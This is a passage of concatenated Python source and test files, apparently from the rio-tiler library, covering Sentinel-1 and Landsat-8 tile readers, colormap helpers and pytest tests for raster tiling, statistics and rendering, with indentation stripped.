raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
scene_params = sentinel1_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/measurement".format(**scene_params)
def worker(band: str):
asset = "{}/{}-{}.tiff".format(
sentinel_prefix, scene_params["beam"].lower(), band
)
with rasterio.open(asset) as src_dst:
with WarpedVRT(
src_dst,
src_crs=src_dst.gcps[1],
src_transform=transform.from_gcps(src_dst.gcps[0]),
src_nodata=0,
) as vrt_dst:
return reader.tile(
vrt_dst, tile_x, tile_y, tile_z, tilesize=tilesize, **kwargs
)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
data, masks = zip(*list(executor.map(worker, bands)))
data = numpy.concatenate(data)
mask = numpy.all(masks, axis=0).astype(numpy.uint8) * 255
return data, mask
|
mvmendes/rio-tiler
|
tests/test_io_cogeo.py
|
"""tests rio_tiler.base"""
import os
import pytest
from rio_tiler import constants
from rio_tiler.errors import TileOutsideBounds
from rio_tiler.io import cogeo
PREFIX = os.path.join(os.path.dirname(__file__), "fixtures")
ADDRESS = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
PREFIX
)
COG_TAGS = os.path.join(os.path.dirname(__file__), "fixtures", "cog_tags.tif")
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
def test_spatial_info_valid():
"""Should work as expected (get spatial info)"""
meta = cogeo.spatial_info(ADDRESS)
assert meta.get("address")
assert meta.get("minzoom")
assert meta.get("maxzoom")
assert meta.get("center")
assert len(meta.get("bounds")) == 4
def test_bounds_valid():
"""Should work as expected (get bounds)"""
meta = cogeo.bounds(ADDRESS)
assert meta.get("address") == ADDRESS
assert len(meta.get("bounds")) == 4
def test_info_valid():
"""Should work as expected (get file info)"""
meta = cogeo.info(COG_TAGS)
assert meta.get("address") == COG_TAGS
assert meta.get("bounds")
assert meta.get("minzoom")
assert meta.get("maxzoom")
assert meta.get("band_descriptions")
assert meta.get("dtype") == "int16"
assert meta.get("colorinterp") == ["gray"]
assert meta.get("nodata_type") == "Nodata"
assert meta.get("scale")
assert meta.get("offset")
assert meta.get("band_metadata")
bmeta = meta.get("band_metadata")[0][1]
assert bmeta.get("STATISTICS_MAXIMUM")
assert bmeta.get("STATISTICS_MEAN")
assert bmeta.get("STATISTICS_MINIMUM")
def test_metadata_valid():
"""Get bounds and get stats for all bands."""
meta = cogeo.metadata(ADDRESS)
assert meta["address"] == ADDRESS
assert len(meta["band_descriptions"]) == 3
assert (1, "band1") == meta["band_descriptions"][0]
assert len(meta["statistics"].items()) == 3
assert meta["statistics"][1]["pc"] == [12, 198]
def test_metadata_valid_custom():
"""Get bounds and get stats for all bands with custom percentiles."""
meta = cogeo.metadata(
ADDRESS, pmin=5, pmax=90, hist_options=dict(bins=20), max_size=128
)
assert meta["address"] == ADDRESS
assert len(meta["statistics"].items()) == 3
assert len(meta["statistics"][1]["histogram"][0]) == 20
assert meta["statistics"][1]["pc"] == [41, 184]
def test_tile_valid_default():
"""Should return a 3 bands array and a full valid mask."""
tile_z = 21
tile_x = 438217
tile_y = 801835
data, mask = cogeo.tile(ADDRESS, tile_x, tile_y, tile_z)
assert data.shape == (3, 256, 256)
assert mask.all()
def test_tile_invalid_bounds():
"""Should raise an error with invalid tile."""
tile_z = 19
tile_x = 554
tile_y = 200458
with pytest.raises(TileOutsideBounds):
cogeo.tile(ADDRESS, tile_x, tile_y, tile_z)
def test_point_valid():
"""Read point."""
lon = -104.77499638118547
lat = 38.953606785685125
assert cogeo.point(ADDRESS, lon, lat)
def test_area_valid():
"""Read part of an image."""
bbox = (
-104.77506637573242,
38.95353532141205,
-104.77472305297852,
38.95366881479647,
)
data, mask = cogeo.area(ADDRESS, bbox)
assert data.shape == (3, 100, 199)
data, mask = cogeo.area(ADDRESS, bbox, max_size=100)
assert data.shape == (3, 51, 100)
data, mask = cogeo.area(ADDRESS, bbox, dst_crs=constants.WGS84_CRS)
assert data.shape == (3, 82, 210)
def test_preview_valid():
"""Read preview."""
data, mask = cogeo.preview(ADDRESS, max_size=128)
assert data.shape == (3, 78, 128)
|
mvmendes/rio-tiler
|
tests/test_utils.py
|
"""tests rio_tiler.utils"""
import os
import mercantile
import numpy as np
import pytest
import rasterio
from mock import patch
from rio_tiler import colormap, constants, utils
from .conftest import requires_webp
S3_KEY = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif"
S3_KEY_ALPHA = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1_alpha.tif"
S3_KEY_MASK = "hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1_mask.tif"
S3_LOCAL = PREFIX = os.path.join(os.path.dirname(__file__), "fixtures", "my-bucket")
S3_PATH = os.path.join(S3_LOCAL, S3_KEY)
S3_ALPHA_PATH = os.path.join(S3_LOCAL, S3_KEY_ALPHA)
S3_MASK_PATH = os.path.join(S3_LOCAL, S3_KEY_MASK)
KEY_PIX4D = "pix4d/pix4d_alpha_nodata.tif"
PIX4D_PATH = os.path.join(S3_LOCAL, KEY_PIX4D)
COG_DST = os.path.join(os.path.dirname(__file__), "fixtures", "cog_name.tif")
COG_WEB_TILED = os.path.join(os.path.dirname(__file__), "fixtures", "web.tif")
COG_NOWEB = os.path.join(os.path.dirname(__file__), "fixtures", "noweb.tif")
NOCOG = os.path.join(os.path.dirname(__file__), "fixtures", "nocog.tif")
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
def test_linear_rescale_valid():
"""Should work as expected (read data band)."""
data = np.zeros((1, 1), dtype=np.int16) + 1000
expected_value = np.zeros((1, 1), dtype=np.int16) + 25.5
assert (
utils.linear_rescale(data, in_range=(0, 10000), out_range=(0, 255))
== expected_value
)
def test_tile_exists_valid():
"""Should work as expected (return true)."""
tile = "7-36-50"
tile_z, tile_x, tile_y = map(int, tile.split("-"))
bounds = [-78.75, 34.30714385628803, -75.93749999999999, 36.59788913307021]
assert utils.tile_exists(bounds, tile_z, tile_x, tile_y)
def test_mapzen_elevation_rgb():
"""Should work as expected."""
arr = np.random.randint(0, 3000, size=(512, 512))
assert utils.mapzen_elevation_rgb(arr).shape == (3, 512, 512)
@patch("rio_tiler.io.landsat8.tile")
def test_expression_ndvi(landsat_tile):
"""Should work as expected"""
landsat_tile.return_value = [
np.random.randint(0, 255, size=(2, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "(b5 - b4) / (b5 + b4)"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "LC08_L1TP_016037_20170813_20170814_01_RT"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (1, 256, 256)
mask.shape == (256, 256)
assert len(landsat_tile.call_args[1].get("bands")) == 2
@patch("rio_tiler.io.sentinel2.tile")
def test_expression_sentinel2(sentinel2):
"""Should work as expected."""
sentinel2.return_value = [
np.random.randint(0, 255, size=(2, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "(b8A - b12) / (b8A + b12)"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "S2A_tile_20170323_17SNC_0"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (1, 256, 256)
mask.shape == (256, 256)
assert sorted(list(sentinel2.call_args[1].get("bands"))) == ["12", "8A"]
@patch("rio_tiler.io.landsat8.tile")
def test_expression_landsat_rgb(landsat_tile):
"""Should work as expected."""
landsat_tile.return_value = [
np.random.randint(0, 255, size=(3, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "b5*0.8, b4*1.1, b3*0.8"
tile_z = 8
tile_x = 71
tile_y = 102
sceneid = "LC08_L1TP_016037_20170813_20170814_01_RT"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (3, 512, 512)
mask.shape == (512, 512)
assert len(landsat_tile.call_args[1].get("bands")) == 3
@patch("rio_tiler.io.cbers.tile")
def test_expression_cbers_rgb(cbers_tile):
"""Should read tile from CBERS data."""
cbers_tile.return_value = [
np.random.randint(0, 255, size=(3, 256, 256), dtype=np.uint8),
np.random.randint(0, 1, size=(256, 256), dtype=np.uint8) * 255,
]
expr = "b8*0.8, b7*1.1, b6*0.8"
tile_z = 10
tile_x = 664
tile_y = 495
sceneid = "CBERS_4_MUX_20171121_057_094_L2"
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (3, 512, 512)
mask.shape == (512, 512)
assert len(cbers_tile.call_args[1].get("bands")) == 3
def test_expression_main_ratio():
"""Should work as expected."""
expr = "(b3 - b2) / (b3 + b2)"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (1, 256, 256)
mask.shape == (256, 256)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr=expr)
data.shape == (1, 256, 256)
mask.shape == (256, 256)
def test_expression_main_rgb():
"""Should work as expected."""
expr = "b1*0.8, b2*1.1, b3*0.8"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr)
data.shape == (3, 256, 256)
mask.shape == (256, 256)
def test_expression_main_kwargs():
"""Should work as expected."""
expr = "(b3 - b2) / (b3 + b2)"
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
data, mask = utils.expression(sceneid, tile_x, tile_y, tile_z, expr, tilesize=512)
data.shape == (1, 512, 512)
mask.shape == (512, 512)
def test_expression_missing():
"""Should raise an exception on missing expression."""
tile_z = 19
tile_x = 109554
tile_y = 200458
prefix = os.path.join(os.path.dirname(__file__), "fixtures")
sceneid = "{}/my-bucket/hro_sources/colorado/201404_13SED190110_201404_0x1500m_CL_1.tif".format(
prefix
)
with pytest.raises(Exception):
utils.expression(sceneid, tile_x, tile_y, tile_z, tilesize=512)
def test_get_vrt_transform_valid():
"""Should return correct transform and size."""
bounds = (
-11663507.036777973,
4715018.0897710975,
-11663487.927520901,
4715037.199028169,
)
with rasterio.open(S3_PATH) as src:
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 64, 64
)
assert vrt_transform[2] == -11663507.036777973
assert vrt_transform[5] == 4715037.199028169
assert vrt_width == 100
assert vrt_height == 100
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 256, 256
)
assert vrt_transform[2] == -11663507.036777973
assert vrt_transform[5] == 4715037.199028169
assert vrt_width == 256
assert vrt_height == 256
def test_get_vrt_transform_valid4326():
"""Should return correct transform and size."""
bounds = (
-104.77523803710938,
38.95353532141205,
-104.77455139160156,
38.954069293441066,
)
with rasterio.open(S3_PATH) as src:
vrt_transform, vrt_width, vrt_height = utils.get_vrt_transform(
src, bounds, 256, 256, dst_crs=constants.WGS84_CRS
)
assert vrt_transform[2] == -104.77523803710938
assert vrt_transform[5] == 38.954069293441066
assert vrt_width == 420
assert vrt_height == 327
def test_statsFunction_valid():
"""Should return a valid dict with array statistics."""
with rasterio.open(S3_ALPHA_PATH) as src:
arr = src.read(indexes=[1], masked=True)
stats = utils._stats(arr)
assert stats["pc"] == [10, 200]
assert stats["min"] == 0
assert stats["max"] == 254
assert int(stats["std"]) == 55
assert len(stats["histogram"]) == 2
assert len(stats["histogram"][0]) == 10
stats = utils._stats(arr, percentiles=(5, 95))
assert stats["pc"] == [31, 195]
stats = utils._stats(arr, percentiles=(5, 95), bins=20)
assert len(stats["histogram"][0]) == 20
def test_render_valid_1band():
"""Creates PNG image buffer from one band array."""
arr = np.random.randint(0, 255, size=(512, 512), dtype=np.uint8)
assert utils.render(arr)
def test_render_valid_colormap():
"""Creates 'colormaped' PNG image buffer from one band array."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8)
cmap = colormap.get_colormap("cfastie")
assert utils.render(arr, mask, colormap=cmap, img_format="jpeg")
def test_render_valid_colormapDict():
"""Create 'colormaped' PNG image buffer from one band array using discrete cmap."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
cmap = {
1: [255, 255, 255, 255],
50: [255, 255, 0, 255],
100: [255, 0, 0, 255],
150: [0, 0, 255, 255],
}
assert utils.render(arr, colormap=cmap)
def test_render_valid_mask():
"""Creates image buffer from 3 bands array and mask."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8)
assert utils.render(arr, mask=mask)
assert utils.render(arr, mask=mask, img_format="jpeg")
def test_render_valid_options():
"""Creates image buffer with driver options."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
assert utils.render(arr, mask=mask, img_format="png", ZLEVEL=9)
def test_render_geotiff16Bytes():
"""Creates GeoTIFF image buffer from 3 bands array."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint16)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
assert utils.render(arr, mask=mask, img_format="GTiff")
def test_render_geotiff():
"""Creates GeoTIFF image buffer from 3 bands array."""
arr = np.random.randint(0, 255, size=(3, 512, 512), dtype=np.uint8)
mask = np.zeros((512, 512), dtype=np.uint8) + 255
ops = utils.geotiff_options(1, 0, 0)
assert utils.render(arr, mask=mask, img_format="GTiff", **ops)
@requires_webp
def test_render_valid_1bandWebp():
"""Creates WEBP image buffer from 1 band array."""
arr = np.random.randint(0, 255, size=(1, 512, 512), dtype=np.uint8)
assert utils.render(arr, img_format="WEBP")
def test_aligned_with_internaltile():
"""Check if COG is in WebMercator and aligned with internal tiles."""
bounds = mercantile.bounds(43, 25, 7)
with rasterio.open(COG_DST) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
with rasterio.open(NOCOG) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
bounds = mercantile.bounds(147, 182, 9)
with rasterio.open(COG_NOWEB) as src_dst:
assert not utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
with rasterio.open(COG_WEB_TILED) as src_dst:
assert utils._requested_tile_aligned_with_internal_tile(
src_dst, bounds, 256, 256
)
def test_find_non_alpha():
"""Return valid indexes."""
with rasterio.open(S3_ALPHA_PATH) as src_dst:
assert utils.non_alpha_indexes(src_dst) == (1, 2, 3)
with rasterio.open(PIX4D_PATH) as src_dst:
assert utils.non_alpha_indexes(src_dst) == (1, 2, 3)
def test_has_alpha():
"""Check if rasters have alpha bands."""
with rasterio.open(S3_ALPHA_PATH) as src_dst:
assert utils.has_alpha_band(src_dst)
with rasterio.open(COG_DST) as src_dst:
assert not utils.has_alpha_band(src_dst)
def test_has_mask():
"""Should return True."""
with rasterio.open(S3_MASK_PATH) as src_dst:
assert utils.has_mask_band(src_dst)
with rasterio.open(COG_DST) as src_dst:
assert not utils.has_mask_band(src_dst)
def test_chunck():
"""Should split a list in multiple chunks."""
chuncks = list(utils._chunks(list(range(10)), 3))
assert len(chuncks) == 4
def test_div():
"""Should return up rounded value."""
assert utils._div_round_up(3, 2) == 2
assert utils._div_round_up(2, 2) == 1
def test_ovr_level():
"""Should return the correct overview level."""
with rasterio.open(COG_DST) as src_dst:
# raw/-1: 2667x2658 0: 1329x1334, 1: 665x667, 2: 333x334, 3: 167x167
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 100, 100, dst_crs=src_dst.crs
)
== 3
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 200, 200, dst_crs=src_dst.crs
)
== 2
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 500, 500, dst_crs=src_dst.crs
)
== 1
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 800, 800, dst_crs=src_dst.crs
)
== 0
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 1500, 1500, dst_crs=src_dst.crs
)
== -1
)
assert (
utils.get_overview_level(
src_dst, src_dst.bounds, 3000, 3000, dst_crs=src_dst.crs
)
== -1
)
|
mvmendes/rio-tiler
|
rio_tiler/colormap.py
|
"""rio-tiler colormap functions."""
import os
from typing import Dict, Sequence, Tuple
import numpy
EMPTY_COLORMAP: Dict = {i: [0, 0, 0, 0] for i in range(256)}
def _update_alpha(cmap: Dict, idx: Sequence[int], alpha: int = 0) -> None:
"""Update the alpha value of a colormap index."""
if isinstance(idx, int):
idx = (idx,)
for i in idx:
cmap[i] = cmap[i][0:3] + [alpha]
def _remove_value(cmap: Dict, idx: Sequence[int]) -> None:
"""Remove value from a colormap dict."""
if isinstance(idx, int):
idx = (idx,)
for i in idx:
cmap.pop(i, None)
def _update_cmap(cmap: Dict, values: Dict) -> None:
"""Update a colormap dict."""
for i, color in values.items():
if len(color) == 3:
color += [255]
cmap[i] = color
def get_colormap(name: str) -> Dict:
"""
Return colormap dict.
Attributes
----------
name : str, optional
Colormap name (default: cfastie)
Returns
-------
colormap : dict
GDAL RGBA Color Table dictionary.
"""
cmap_file = os.path.join(os.path.dirname(__file__), "cmap", f"{name.lower()}.npy")
cmap = numpy.load(cmap_file)
assert cmap.shape == (256, 4)
assert cmap.dtype == numpy.uint8
return {idx: value.tolist() for idx, value in enumerate(cmap)}
# From https://github.com/mojodna/marblecutter/blob/5b9040ba6c83562a465eabdbb6e8959e6a8bf041/marblecutter/utils.py#L35
def make_lut(colormap: Dict) -> numpy.ndarray:
"""
Create a lookup table numpy.ndarray from a GDAL RGBA Color Table dictionary.
Attributes
----------
colormap : dict
GDAL RGBA Color Table dictionary.
Returns
-------
lut : numpy.ndarray
colormap lookup table
"""
lut = numpy.zeros(shape=(256, 4), dtype=numpy.uint8)
for i, color in colormap.items():
lut[int(i)] = color
return lut
def apply_cmap(
data: numpy.ndarray, colormap: Dict
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Apply colormap on tile data.
Attributes
----------
data : numpy ndarray
1D image array to translate to RGB.
colormap : dict
GDAL RGBA Color Table dictionary.
Returns
-------
data : numpy.ndarray
RGB data.
mask: numpy.ndarray
Alpha band.
"""
if data.shape[0] > 1:
raise Exception("Source data must be 1 band")
lookup_table = make_lut(colormap)
data = lookup_table[data[0], :]
data = numpy.transpose(data, [2, 0, 1])
return data[:-1], data[-1]
def apply_discrete_cmap(
data: numpy.ndarray, colormap: Dict
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Apply discrete colormap.
Note: This method is not used by default and left
to users to use within custom render methods.
Attributes
----------
data : numpy ndarray
1D image array to translate to RGB.
color_map: dict
Discrete ColorMap dictionary
e.g:
{
1: [255, 255, 255],
2: [255, 0, 0]
}
Returns
-------
arr: numpy.ndarray
"""
res = numpy.zeros((data.shape[1], data.shape[2], 4), dtype=numpy.uint8)
for k, v in colormap.items():
res[data[0] == k] = v
data = numpy.transpose(res, [2, 0, 1])
return data[:-1], data[-1]
|
mvmendes/rio-tiler
|
rio_tiler/io/landsat8.py
|
<gh_stars>0
"""rio_tiler.io.landsat8: Landsat-8 processing."""
import datetime
import os
import re
from concurrent import futures
from typing import Any, Dict, Sequence, Tuple, Union
from urllib.request import urlopen
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_toa import brightness_temp, reflectance, toa_utils
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidLandsatSceneId, TileOutsideBounds
from rio_tiler.utils import _stats as raster_stats
from rio_tiler.utils import pansharpening_brovey, tile_exists
LANDSAT_BANDS = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "QA"]
def landsat_parser(sceneid: str) -> Dict:
"""
Parse Landsat-8 scene id.
Author @perrygeo - http://www.perrygeo.com
Attributes
----------
sceneid : str
Landsat sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
pre_collection = r"(L[COTEM]8\d{6}\d{7}[A-Z]{3}\d{2})"
collection_1 = r"(L[COTEM]08_L\d{1}[A-Z]{2}_\d{6}_\d{8}_\d{8}_\d{2}_(T1|T2|RT))"
if not re.match("^{}|{}$".format(pre_collection, collection_1), sceneid):
raise InvalidLandsatSceneId("Could not match {}".format(sceneid))
precollection_pattern = (
r"^L"
r"(?P<sensor>\w{1})"
r"(?P<satellite>\w{1})"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionJulianDay>[0-9]{3})"
r"(?P<groundStationIdentifier>\w{3})"
r"(?P<archiveVersion>[0-9]{2})$"
)
collection_pattern = (
r"^L"
r"(?P<sensor>\w{1})"
r"(?P<satellite>\w{2})"
r"_"
r"(?P<processingCorrectionLevel>\w{4})"
r"_"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<processingYear>[0-9]{4})"
r"(?P<processingMonth>[0-9]{2})"
r"(?P<processingDay>[0-9]{2})"
r"_"
r"(?P<collectionNumber>\w{2})"
r"_"
r"(?P<collectionCategory>\w{2})$"
)
for pattern in [collection_pattern, precollection_pattern]:
match = re.match(pattern, sceneid, re.IGNORECASE)
if match:
meta: Dict[str, Any] = match.groupdict()
break
meta["scene"] = sceneid
if meta.get("acquisitionJulianDay"):
date = datetime.datetime(
int(meta["acquisitionYear"]), 1, 1
) + datetime.timedelta(int(meta["acquisitionJulianDay"]) - 1)
meta["date"] = date.strftime("%Y-%m-%d")
else:
meta["date"] = "{}-{}-{}".format(
meta["acquisitionYear"], meta["acquisitionMonth"], meta["acquisitionDay"]
)
collection = meta.get("collectionNumber", "")
if collection != "":
collection = "c{}".format(int(collection))
meta["scheme"] = "s3"
meta["bucket"] = "landsat-pds"
meta["prefix"] = os.path.join(collection, "L8", meta["path"], meta["row"], sceneid)
return meta
def _landsat_get_mtl(sceneid: str) -> Dict:
"""
Get Landsat-8 MTL metadata.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
sceneid have to be LANDSAT_PRODUCT_ID.
Returns
-------
out : dict
returns a JSON like object with the metadata.
"""
scene_params = landsat_parser(sceneid)
meta_file = "http://{bucket}.s3.amazonaws.com/{prefix}/{scene}_MTL.txt".format(
**scene_params
)
metadata = str(urlopen(meta_file).read().decode())
return toa_utils._parse_mtl_txt(metadata)
def _convert(arr: numpy.ndarray, band: str, metadata: Dict) -> numpy.ndarray:
"""Convert DN to TOA or Temp."""
if band in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]: # OLI
multi_reflect = metadata["RADIOMETRIC_RESCALING"].get(
f"REFLECTANCE_MULT_BAND_{band}"
)
add_reflect = metadata["RADIOMETRIC_RESCALING"].get(
f"REFLECTANCE_ADD_BAND_{band}"
)
sun_elev = metadata["IMAGE_ATTRIBUTES"]["SUN_ELEVATION"]
arr = 10000 * reflectance.reflectance(
arr, multi_reflect, add_reflect, sun_elev, src_nodata=0
)
elif band in ["10", "11"]: # TIRS
multi_rad = metadata["RADIOMETRIC_RESCALING"].get(f"RADIANCE_MULT_BAND_{band}")
add_rad = metadata["RADIOMETRIC_RESCALING"].get(f"RADIANCE_ADD_BAND_{band}")
k1 = metadata["TIRS_THERMAL_CONSTANTS"].get(f"K1_CONSTANT_BAND_{band}")
k2 = metadata["TIRS_THERMAL_CONSTANTS"].get(f"K2_CONSTANT_BAND_{band}")
arr = brightness_temp.brightness_temp(arr, multi_rad, add_rad, k1, k2)
# TODO
# elif band == "QA":
return arr
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
sceneid have to be LANDSAT_PRODUCT_ID.
Returns
-------
out : dict
dictionary with image bounds.
"""
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
return dict(
sceneid=sceneid,
bounds=toa_utils._get_bounds_from_metadata(meta["PRODUCT_METADATA"]),
)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
sceneid have to be LANDSAT_PRODUCT_ID.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with bounds and bands statistics.
"""
scene_params = landsat_parser(sceneid)
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
landsat_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
def worker(band: str):
asset = f"{landsat_prefix}_B{band}.TIF"
if band == "QA":
nodata = 1
resamp = "nearest"
else:
nodata = 0
resamp = "bilinear"
with rasterio.open(asset) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
data, mask = reader.preview(
src_dst, nodata=nodata, resampling_method=resamp, **kwargs
)
if band != "QA":
data = data.astype("float32", casting="unsafe")
data = _convert(data, band, meta)
data = numpy.ma.array(data)
data.mask = mask == 0
statistics = raster_stats(data, percentiles=(pmin, pmax), **hist_options)
return dict(bounds=bounds, statistics=statistics)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
responses = list(executor.map(worker, LANDSAT_BANDS))
info: Dict[str, Any] = dict(sceneid=sceneid)
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(LANDSAT_BANDS)]
info["bounds"] = [
r["bounds"] for b, r in zip(LANDSAT_BANDS, responses) if b == "8"
][0]
info["statistics"] = {b: d["statistics"] for b, d in zip(LANDSAT_BANDS, responses)}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = ["4", "3", "2"],
tilesize: int = 256,
pan: bool = False,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Landsat-8 data.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
sceneid have to be LANDSAT_PRODUCT_ID.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple, str, optional (default: ("4", "3", "2"))
Bands index for the RGB combination.
tilesize : int, optional (default: 256)
Output image size.
pan : boolean, optional (default: False)
If True, apply pan-sharpening.
kwargs: dict, optional
These will be passed to the 'rio_tiler.utils._tile_read' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in LANDSAT_BANDS:
raise InvalidBandName("{} is not a valid Landsat band name".format(band))
scene_params = landsat_parser(sceneid)
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
landsat_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
bounds = toa_utils._get_bounds_from_metadata(meta["PRODUCT_METADATA"])
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
def worker(band: str):
asset = f"{landsat_prefix}_B{band}.TIF"
if band == "QA":
nodata = 1
resamp = "nearest"
else:
nodata = 0
resamp = "bilinear"
with rasterio.open(asset) as src_dst:
tile, mask = reader.tile(
src_dst,
tile_x,
tile_y,
tile_z,
tilesize=tilesize,
nodata=nodata,
resampling_method=resamp,
)
return tile, mask
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
data, masks = zip(*list(executor.map(worker, bands)))
data = numpy.concatenate(data)
mask = numpy.all(masks, axis=0).astype(numpy.uint8) * 255
if pan:
pan_data, mask = worker("8")
data = pansharpening_brovey(data, pan_data, 0.2, pan_data.dtype)
if bands[0] != "QA" or len(bands) != 1:
for bdx, band in enumerate(bands):
data[bdx] = _convert(data[bdx], band, meta)
return data, mask
|
mvmendes/rio-tiler
